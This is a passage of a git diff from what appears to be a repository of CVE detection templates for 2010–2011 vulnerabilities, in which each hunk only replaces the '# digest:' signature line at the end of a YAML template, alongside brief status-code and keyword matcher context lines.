- type: status status: - 200 -# digest: 4a0a004730450220539e9d6bb4b7d50a7f9a7b667d71f867c1269d30d845e61f29b8e88370f80d1e022100ac97c13da8a1971722dd205468217eaba67767118bd97cf63e9c933f099c8715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100971bc0b9c44c563263b88dc9081ed7a7ebdb97436d54378ba85980b2c72eef69022100a1532564ace0868c003dbb16778a469c210bfefdd229b77f0a044c68d92fb904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index d761c3ac0f..1ad3232e21 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df58fff1f3c41f0bb2e7cffc588de1539e3e3836befa9de4e1f06a5d9f04c2b802210083af992f09518510d80aa9a38b8c07453e81628f93cbc5b0fd36fc2e1a883bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220213b12685e13131f36c991ca06055646ecefdae22a6f6cf08df5280b6b7ac71d0221008af6cbdc5122459f28bc5e484b03cf05049281fc63346ee6cbd55628775989ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 175dc13416..0a35465969 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c37d961964fbcd929dedc795e0f58c194527654157a2f86ca940108ed06c346a02203292c5ccaacb2231fa3525be77ab8b74a27cba4f28c35e587fdbac39b44c4da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de432e753e14b59026f985b85718f92eb5b10300d2b74274b453b4881ba30c2d022100e12cc0286642246fa0f115199b7bf50056ad0924adb27d082da484fe1020c38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 540fd71547..f94ca062e9 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220731b630d781a49cbe5204a65cc925bf89702091e3a9e7aa70850fde793905752022100deb1699185259f6c8fe823f320455fdfcb2e7bb021f5809ad5e3e85ce3c54510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbf4385a8fe73b497c59d6aa054d85936abd2811dbb2217eca1a0b274f765d39022100bab889d4d826e238fb6b696dbc5ebac88650a6030d7833681bf54ef49c302c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index ef925fb2a3..db12f5ec84 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d40ba8b9b481ae166888c551f72da68db055a11093fb78111e3b2c6b1d0b8d900221009e3b4258da5e1f03ffd3b1e4bdf63f4eb9985b20af64a31b8e0769ed840960ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3fa36d53dd967a93c8dd541cdb538b87fced42a96c826ced9fae769379723bb022002b6626fd5c494e624c7433874024757ba68daf10cbe720d915b3046615cfec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index d78d18a719..19a77a6b1b 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eec0a10467257dc4fe9e5b4bb4eaddfcea252a543161ea0d283d5a72bac72120022001467f6d2b1303150b144f8e62a51b12e036c7e89d9d225514b357f39c403000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb594000593f53fd468052ee9c8cb8c8bd3551511ac6b27efe5a02886ea2c308022100db78cf667c0d3d4bbc3390cacff7e22e11579b0a9898e1cc508a37fba49776ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 1d9f4d953a..f1081c9df4 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5f85dd986a1d0ad4ba8d517797bc3701750a7d7bf4c5713c10f908f43c67586022100806f8c203e0a529f37e9cf068e469e3fac1cf421d847d26940f48f857abbc1a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cedb11c9cecc2838db4712519543caee034f55c310b0d60f31120ed9d6303de2022023d18ea3c2850d735344aaf109137eb75e0a10be17e3141dc633f620cf6485e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 40c097c0ad..793b0f166e 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022077113634884da4ef865ca94b2ee7df0fee6a54b02d65864d8d0914f3b6addbf002203a926595b9b2d25ef287c355308f11792796d904556fe01207c800a15d99645a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1cd45d7328e2d4317ad7d768642721ff530c163504ec85efb82984d0e2005770220025de973bef9285b88556b392748116f8cb734e87874815e4c54a4dd46fb45e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index aeadee5bca..3d88216cb3 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5dd079a5e74c0a667d179123e54dcd75cb9f630efc5a27b28d4c19fa90806a3022100cef8eb3f80950d53aff9eac487482525a1cd731182acca02eee4b5b6087c23b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220489998616b21468ad5e95354bbb268fae3ae65058024f8237fea85aee7d9edf202200716c33ecadb748e41249f9ac1c29d988d75f9a3391bab58397a37ff81fa0719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index dd1f09c1d2..2d8930b8f2 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fdd973723abb3ec0f3e399df369a16f587425edad3a51994b1888d60ed65bd9022022ac61a31821cc6a16fd4b12a5f8e402090c01bfc530b8662c11381d13c862c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005f8bad5014e86f4040c61be5b1a5c8fc2d75b2edfa216ed9ffda3a76d0740c902200c6f58e7c4c1b0adc2fc28572feecb92e8c8c532252b5c0f1e180dedd05a43a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 34a0c09961..9a8e16285b 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed26b0bbeaaba277168e22d6c019818acb8019c5313cd05227b14a379490d391022100b173aea58b5b7b7343ec98009ef6d65eeb69e8de3364a5957050537d3b2673e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066f2978808258540466e01cfd5da6452d78b1ae38f90b87fa604130ae0256dea0220360d1fd79715c887e237e84d1c4d96e87e2285b6cc054a26265f5ab2436c7ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 2aac852a13..23c6b25fd1 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d92e2b1f90013e836b6357eab8b35907fe205811ceccdfeadec61a6e14c4bfc2022100f643815f412d7a183edf9d640a3384338875eed2e59033b9d6852cc78b88dddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036441deef54186effe4bc8c14c01564b3885f6058e30608ad2fe449e677c00a702205c4d8db4d4a05a86268c87cca7d2b6291aa83a4a825791567eefa258512efac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index b36b71c45f..9091cc4c85 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022055282e097cada824716a1132835910ae549eda512b08b7d249ca747743d2699a022100aded409dcfe3fd85214075406aa8b20d6de14eebcb958fdd9966de08a109fc38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0dfd178074a70ba2df66d89945e28e53c9884c0edd9c70c852dbcb7660c8186022100a674e47e2648303e5f73065ae6717af8f6585ce08228f5e00d2ff0cb0c6c0f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index f164386601..c2ae8d7399 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b095b1d1d4407f08447f760c1185c842baaf9bc39358cd1a6d9c6d5c5456f0f022001934471878708a173e28ab337ae303cd8e64fb9c3e3e59df52cadc20fb6b58c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2c8f8c5253fd5930c75c6e8dff0521fc62e0edd1a9b2980fbbd58fb12cc07980221009867ed45118103b41c68999941a7158214d3b0bc9260f89f1f96284f968826df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index f134e91bdf..6f27d148f1 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f95311eb9d11414e153cc82bf81e5ae3c46cbd6531189658fb6d14fc3fb82ae02210091aef93930a52079339893e4a31eb22528474821ec81b1cf2d97e8344fea0ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5fb43889dc657b264f315e972e5b7c13f6935dfeb167957c28e02c70970e654022100cc2119db313fdc466b2ad34c24274e8cc35aa77cff8902db55512cb591d6f3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 160edfc1eb..d74f9af6f9 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -42,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a0047304502210090c56e842aeb3570e427312f5aee63103c4b7521f430ae37bdf3307a3d3147c8022065ff372bacb5bda3d4f03c53a39317a8bb9fe0aaa14e20f4eebfd32acf972065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022073e60a9b93f4d4230c42021a33b66bd8ef3b89067d69298ee6c3a26216e084c9022100ed060b68d03e6c8d32b16dd7de90e28ff85c0c5e11bc60c08bfb0d340e3eb423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 49bb8269d3..9a857bb621 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbf7398b57938fea537f5a30f8781a9a7094027c0aa7ffb5b94f2e75c71e722c02210090225f538796981048a678a70a32955fa592c09a8d9b86af85f2dca137f4d264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009adb3c84c11617bbc746bd9c7b6324efae60c03e426660c390ab8cf788c2fbd60221008fef6a1236ac581665e90bd7bdbc93eefeacad2eb02372033123952fe428faaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 1f9bb1ff1d..6086205628 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201e304c93872774375c9e2f40a3ea3a62a2e718f2373aa7d717296bea538a9d5602204a3b5200b63cb849e7d2f3dd9dfff012c07cdb6472472b0188f5c953fe181dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a9af490f71ca4189c757dc4708e4c927296e6465493110b3ce6196b74fe414802207ccb8d0f9311b069aeda0acfd9c910488402cea3d217409864d799cd26b07ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 0cc92ded45..d0b5538024 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1f8a372c1bd7932dce981902ac35522c36e7998e6ebca24a9674c9a95dbb83e02206b50e0d0af2f400db04740e43eeb43f9d9ba537f771047dc85207c54326376ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100902ce93a3c2d69d3099524ca00c0d57cb04f1f571c6dd0ac618a99bcaca7680c02201306404f7e2bcd65725a512360231c49b249c39e3cba92c941924bf7fe875d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index ca5f8ca92a..bb238c6879 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100acb1d49a85e8148634326e4c540adb9cbae3fd6807926467774e19b92ba508a2022100ff8ae67f23946a9a48b56c85d74a003f211d02b379ed1d446234f3fb2f4ca887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220021f9becb5c0bae1d43b564ebe8c9145f4eba9fc6c340cc21ec9fe385112ccc1022100dfaf431bb69d21f56a3e2881f2da3e15463fe22ee8c1337c9b21d31f46994653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 1b4e63d598..7be5c856d4 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a92230f9eac5cba3cbd4791acec5b8cf3cd4a0762c4b3bb3aaca79e5d4f5e61022100d187141dbf118e5c522c0b10a8e03d9339dfa8c86a02fb2ac445b9be7b74c57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d623f963e0d454b141ad708ef6cbcfe61a18dc6ef5f304125dbe97daf999d5660220366a29fb05243a01e8d429b4bfb9ef028e6432183b1f5b182fe09e16ad998c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 3cfcfbbf88..301ed00bab 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f9a4d2c0299973501883e58d5c3a97b018103699cb9b3631ec1cdabc4a8adfa602207c1c3c3aa91f435b358f0c3b805b814035f680e56429822d17f4fef3ed0451a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054c7e6d44bb9429240624152f5180f95d3854d1c864a299fcc23a677c19c42b6022100ddabbb2800d6a79c66415e5707659f4349824f4fdee44e9a902ca1418d45fb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 5757acb5f0..8f03abbd4c 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f081c8c91e4617e57f2d789627f44bbe9800bf9091202355b24fecf7ae94dd60221009e2b1786ca510e019b852ba7ab30f16dfa4ca4749bf2af388ff29fd8cb580b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de40290358f56cdef862841dd607dafddb3de4fb88d196897074c6f0e66b55b0022062e990cb1bda92259d5dc31880e5efef65c73f37d02203efd0db0941cd9b906d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index c98ef463fd..8137ac90fc 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026c6160757337260f02182e7da5247cd3375279bda0cb4019649d4d424ad7f820221008b06dbaf2dab8b4048049c3bb9dff509b4835cb93b748812a506ce7da9f72922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e16fadad15f02f10e000ed3d059fb90ddd947737883686989d28e4bbbdf5417602203ea2c50b229a584ae9a9de2544239f80ac3bfd906dce98299d73650d51b45407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index a7b41c31a2..867f3fab86 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210097d65a61847a71cf146303c48b07acbe6ee9573724d9b8a50d2bd5eb79462b780220062ff7750adae7407b954879fb76f5894ae9e28a09651cd9eb7cea7ddaada2d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aee17942f89abefe614d952a803a584cae8a128f5c65d14d43b6a809e809ee31022100f8c788ec5c6e8406cce24e84067f3fd45b012da2dee210cd1b9d8c85bfb9c421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 556869225f..a09120acba 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b8f0bcba9fcb205a9e391e62ed56c7e34cdde7e59250198d678127ead4b9cef0220695a0b07debc640b341399be8b0ab088773c4e7e27cfb7b583f69432fb98935f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b7c2e1daef1648adb57db668dc30a2d292ef1822f954a8689bef39e110fa0b00220111eda05de3def7fa37814d1b7273529485b22b840f3b4e456f32cc7b2bcbee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 6482519e0f..15ce4dbb1e 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e52378d2ad2631ef3866dc183c3d7e50e433fb239c2bf582d9743eb3ae8fbd430220419e2e3f855267e9a4cc1f49022609788d95e7e531a7ef02b34f9af4fdb62d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ced176498bb5b337873dd9b83dc4ea5660385c781b36852a80bc48e44b2062f202210085225ebf3d6e167413989e95e94590976c7a1eb88f69718804b207b1526e6219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 1868778a1c..0a61d0215a 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071fd623131d7bc529448e9ee46830beafa89d7ecccaad9846b2acccf9d44bfc1022100ef9a8e16568a6124b47717f337eb7629405220ee1508d3f0e0a4caf535ac2233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203613c8e901831ed8aefa0d92ce2ca263d6f8e72339fcf5b1c07adf34ae1e3bb9022051398a9e04cb6232c333983255e8d1ee7cce2477d82e340aa6f42bcb05c0ad19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index b3055ee9ae..a46ca6fe00 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b7392964ef378762e6b1bce5a5b25eb2084c11984e0c3ec13108d09f465682d02204ed59732b3f70aa5bfdb73ce1a8d1cc11c64e1393bcd0095f5bfdb14d7d1fb23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e42f7e3d836e9fce3de4ce3a385e83ca881afca40a53a36c9815a35c627428902210081ac72c639a506b407a3b154b1e9da7a3020d6ec8f23dd6209c2e06b866620e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index a365277470..7376816b4d 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ead2f7a38136dd68994c79dbeb18cf01fd4d516595fc88f5973525e340511446022100d80027066d11610588ffd72fd24fcdd4c226839cca15cdc0b265a9b54bf7cb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e818e5ab9ba60046c4ced759c2407a39ff56ec492da0f81405e9e68f8d13cc3022100ff1a65f8ef84ea88e1bf2c375426acdfd36df72a81ad1aaf4bf19f46978d201d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index b68488e0a4..d6e98a5915 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and -# digest: 4a0a0047304502206a77864d6263a6c9397ee40b285ee2af4533ac19ea960e55397ed2caa5316154022100bf56f186c8aa43739fdb6501b7b59969e146f9d69ecb772b6097d7b1fd87cb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c14d6b2618fb10ec6163f8efaf3de0c5a59d4ce861fc5becf29c4a76ccf5ca50022100feecdfb685638ee3645b23fb5cb960dcefe2723d09d833505827274ce1e5a22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 686557af6f..0b418552a9 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e48c760facc10875f3b22aa4b2e7261cb9d94dbddc3bb83656766cfd3ae573d2022100cc1e13347644fd3ab565397b42e4b833231009c21c579f4ad5b936e3f8fa3f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f747027756c1ce470e66270af63d3222037f2981bd0967fecc263d88f6d1c6ec02202927b3d30c6495036748c0a9eb2d5d946b8459dc589230b8f3ee0392f4a42e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 461836ab9b..d3a8017a41 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a828722c2b46d5775d2ec9bd905f56af4509edb26806bea57f8a6dc77bfebb50221009a2cfeda87892055cac84f182ea05c4f0f1e41e4835ab51b04bcb0281b4f7838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207755340706f5637dd855c5076f1e6300b9dd9f488b44bd5f0b620e6dd5a265f1022100c5be1435ebce2d0fe0c31ecfe70c8e598d943a56026ea805561f6ca34d489796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 8348866acf..001dbef565 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e014fc72bf46cbcd1b06d11a0170ba550ca4984bf04f0d8c369f1cc4e4c1033022100fbf7e61f5dd4d08b3959553ada280e1d27b94faa5610e688201180230e2236e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b3c9be973f5be666b8682db7fcc9990da8255776df4183ed6c19729e69ac524022100dfab9cdb1144c54b1f0692c9e47ab05a89e8d1e4f086d3a1d812b50a2d4fc880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 4beeb2b25d..af295c65b6 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022038c3fec75cb4b8bf587e6df77c5d753c982049ad15b8672bfcddac5612c9e97a022054d03eb720bbbbc7d5ab05c19117b0ffcd706c84d4c37d51eb5c1aa0d899621b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100865d5513292cc8d00cb7aa79119fd87ab835f5a27ff658d26f205da38ba6e5c8022100d27842b9d191679a90c77a495c5a4a79412ad8fe79c9166bba2e806016cae0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 85f995e396..08f4929265 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202a877db4fb15ee1e82c7f37a95b434e0cc663caa5035ff5f2064dc717b056b7c022023f26db461db668dd7d9b185eb2803f6056bc3bd0ffd47204c8b102f592a2d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f5052032e52c3a970246ace434d8e8756fae1b121cc6385c20633fca723d0a30220540019830ab0e677d7cbd6cfb23d46e678eccbbe68574dc2ea270cd05afe139b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 59b614c428..c4d0cf264a 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029dc11cace1e2333cfd9688a0051a1d57addb9ff4bd78726fa9e9e0f33c66c7e022073cf2693084088fff3a4a54c921729c04768bfb3e1be915ab2744bd639beb38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a1b6221bd7e9a9f1d748a15d07ad808c26da970706d964205e261568c074081022100a63390a002de9de96bd45c407466a0ecec5254446175296da3b1047abe2371f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index b8ecec2050..78f18346df 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -48,4 